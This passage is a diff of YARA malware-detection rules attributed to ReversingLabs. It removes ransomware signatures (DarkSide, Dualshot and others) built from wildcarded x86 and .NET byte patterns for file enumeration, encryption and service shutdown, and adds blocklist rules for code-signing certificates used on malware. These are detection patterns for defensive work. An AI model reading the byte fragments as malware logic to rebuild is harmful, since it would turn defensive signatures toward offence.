C1 ?? 66 3B C3 75 ?? 8B - 7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? - 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F - 5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? - ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ?? - 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ?? - ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ?? - 8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ?? - 8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7 - } - $find_files_p2 = { - EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 - 57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ?? - ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD - 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 - ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? - ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D - ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 - ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? - 83 C4 ?? E9 - } - $encrypt_files_p1 = { - 8B FF 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? 8D 45 ?? FF 75 ?? FF 75 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 8D 7D ?? 8B F0 6A ?? 59 F3 A5 83 CE ?? 39 75 ?? 75 ?? E8 ?? ?? ?? ?? 83 - 20 ?? 8B 45 ?? 89 30 E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 89 - 03 3B C6 75 ?? E8 ?? ?? ?? ?? 83 20 ?? 89 33 E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? - 8B 45 ?? 8D 75 ?? 83 65 ?? ?? 33 C9 41 C7 45 ?? ?? ?? ?? ?? 83 EC ?? 89 08 8B 45 ?? - C1 E8 ?? F7 D0 23 C1 6A ?? 59 89 45 ?? 8B FC 8D 45 ?? 50 FF 75 ?? F3 A5 E8 ?? ?? ?? - ?? 8B F8 83 C4 ?? 89 7D ?? BA ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 4D ?? 8B C1 23 C2 3B C2 - 75 ?? F6 45 ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 81 E1 ?? ?? ?? ?? 8D 75 ?? 89 4D ?? 6A ?? - 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 7D ?? 83 FF ?? 75 ?? 8B - 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? - ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 59 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 57 8B 04 - 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? ?? ?? 85 F6 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? - ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8A 45 ?? 0C ?? EB ?? 83 F8 ?? 8A - } - $encrypt_files_p2 = { - 45 ?? 75 ?? 0C ?? 57 FF 33 88 45 ?? E8 ?? ?? ?? ?? 8A 55 ?? 59 59 8B 0B 80 CA ?? 8B - C1 88 55 ?? 83 E1 ?? C1 F8 ?? 6B C9 ?? 88 55 ?? 8B 04 85 ?? ?? ?? ?? 88 54 08 ?? 8B - 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? F6 45 ?? ?? 8B 04 85 ?? ?? ?? ?? C6 44 08 ?? ?? - 74 ?? FF 33 E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 8D 45 ?? C6 45 ?? ?? 50 FF 75 ?? 8D - 75 ?? 83 EC ?? 6A ?? 59 8B FC FF 33 F3 A5 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B F0 - FF 33 E8 ?? ?? ?? ?? 59 8B C6 E9 ?? ?? ?? ?? 8B 03 8B C8 83 E0 ?? C1 F9 ?? 6B D0 ?? - 8A 45 ?? 8B 0C 8D ?? ?? ?? ?? 88 44 11 ?? 8B 0B 8B C1 C1 F8 ?? 83 E1 ?? 6B D1 ?? 8B - 0C 85 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 32 44 11 ?? 24 ?? 30 44 11 ?? F6 45 ?? ?? 75 ?? - F6 45 ?? ?? 74 ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 4C - 08 ?? ?? 8B 75 ?? B9 ?? ?? ?? ?? 8B C6 23 C1 3B C1 0F 85 ?? ?? ?? ?? F6 45 ?? ?? 74 - ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 81 E6 ?? ?? ?? ?? 89 75 ?? 8D 75 ?? - 6A ?? 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B D0 83 C4 ?? 83 FA ?? 75 ?? FF 15 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? - ?? ?? 80 64 08 ?? ?? FF 33 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 0B 8B C1 C1 F8 ?? 83 - E1 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 89 54 08 ?? 33 C0 5F 5E 5B 8B E5 5D C3 - } - $shutdown_services_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F9 8B 75 ?? 8B 1D - ?? ?? ?? ?? FF D3 83 7E ?? ?? 89 45 ?? 72 ?? 8B 36 6A ?? 56 FF 37 FF 15 ?? ?? ?? ?? - 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? 8B - 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? - ?? 83 F8 ?? 75 ?? 66 90 FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A - ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF D3 2B 45 ?? 3B - 47 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B CF E8 - ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 - } - $shutdown_services_p2 = { - FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? - 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF D3 2B 45 ?? 3B 47 ?? 0F 87 - ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 - ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($shutdown_services_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures[i].serial=="14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" and 1386806400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Darkside : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE { meta: - description = "Yara rule that detects DarkSide ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "061b00cb-9b70-521f-ab3f-7e6b3c129194" - date = "2021-05-17" - modified = "2021-05-17" + id = "28a56bcf-1f13-5478-a6d5-7595464da198" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DarkSide.yara#L1-L94" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "128af9a1b143e4b0928dd2b243e69497be906175f44815cc5703f17cce48ec9d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16302-L16318" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7c1bec5059d40fc326bb08775888ed169abc746228eeb42c897f479992c5acab" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DarkSide" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_v1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 04 45 ?? ?? ?? - ?? 50 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? - ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? - ?? ?? ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 9D ?? ?? - ?? ?? 83 3B ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8D 85 ?? ?? - ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 7D ?? - ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5A 59 5B - 8B E5 5D C2 - } - $enumerate_drives = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 8B D8 85 DB 74 ?? C1 EB ?? 8D B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 - ?? 74 ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? 8D 76 ?? 4B 85 DB 75 ?? 5F 5E 5A 59 5B 8B - E5 5D C3 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? C7 - 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 - ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 40 ?? 50 FF 15 ?? ?? ?? - ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 - ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2 - } - $escalate_privileges = { - 55 8B EC 83 C4 ?? 53 51 52 56 57 8D 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 - ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 - FF 75 ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? AD 8B F8 83 - 7E ?? ?? 74 ?? C7 46 ?? ?? ?? ?? ?? 83 C6 ?? 4F 85 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 75 - ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C3 - } - $enumerate_netshare = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 6A ?? - 8D 45 ?? 50 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 83 7E ?? ?? 75 ?? 68 ?? - ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 C7 03 ?? ?? ?? ?? C7 43 ?? - ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 8D 47 ?? 50 53 FF 15 ?? ?? ?? - ?? 83 C4 ?? 53 FF 15 ?? ?? ?? ?? FF 36 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? - ?? 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 83 7D ?? ?? 75 ?? - FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2 - } - $find_files_v2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D BD - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? - 83 C4 ?? 66 83 7C 47 ?? ?? 74 ?? 66 C7 04 47 ?? ?? 83 C7 ?? C7 04 47 ?? ?? ?? ?? C7 - 44 47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? - 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 C4 - ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 53 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2 - } - condition: - uint16(0)==0x5A4D and (($find_files_v1 and $enumerate_drives and $escalate_privileges) or ($find_files_v2 and $enumerate_netshare)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Nanjing Ranyi Technology Co., Ltd. " and pe.signatures[i].serial=="58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" and 1352246400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Dualshot : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE { meta: - description = "Yara rule that detects Dualshot ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "17828c85-0f1b-581b-842a-24e6f26e0b4d" - date = "2020-11-20" - modified = "2020-11-20" + id = "78bfa550-d85e-5776-a65d-ff0039abd2c4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Dualshot.yara#L1-L112" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a401369357901f42ad83227b025d3b14b3acd1f50705da82afbe8e4f85501919" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16320-L16336" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ca00f1adacd6ff16e54b85be38c3a4545a10c76548e0647f7f3f6cfa4dff412d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Dualshot" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $internal_encrypt_file = { - 02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 02 28 ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? 03 28 - ?? ?? ?? ?? 0D 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 09 16 09 8E 69 6F ?? - ?? ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 02 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? - ?? 02 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 00 02 28 ?? ?? ?? ?? DE ?? 26 - DE ?? 2A - } - $encrypt_files_p1 = { - 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? - 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 - ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? - 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? - ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 11 - ?? 6F ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? - ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 1F ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 - ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? - ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 11 ?? - 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? - 26 DE ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 11 ?? - A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 2C ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F - ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 11 ?? - 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A - } - $encrypt_files_p2 = { - 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 17 9A 28 ?? ?? ?? ?? 13 ?? 02 - 18 9A 28 ?? ?? ?? ?? 2C ?? 02 18 9A 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 02 18 9A 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 18 - 9A 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 2A 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 18 8D ?? ?? - ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 00 - 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 08 20 ?? ?? ?? - ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 - 25 1A 11 ?? 08 11 ?? 8E 69 6F ?? ?? ?? ?? 9A A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 11 ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F - ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 - ?? 1F ?? 3F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 17 - 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 2A - } - $find_files_p1 = { - 73 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 72 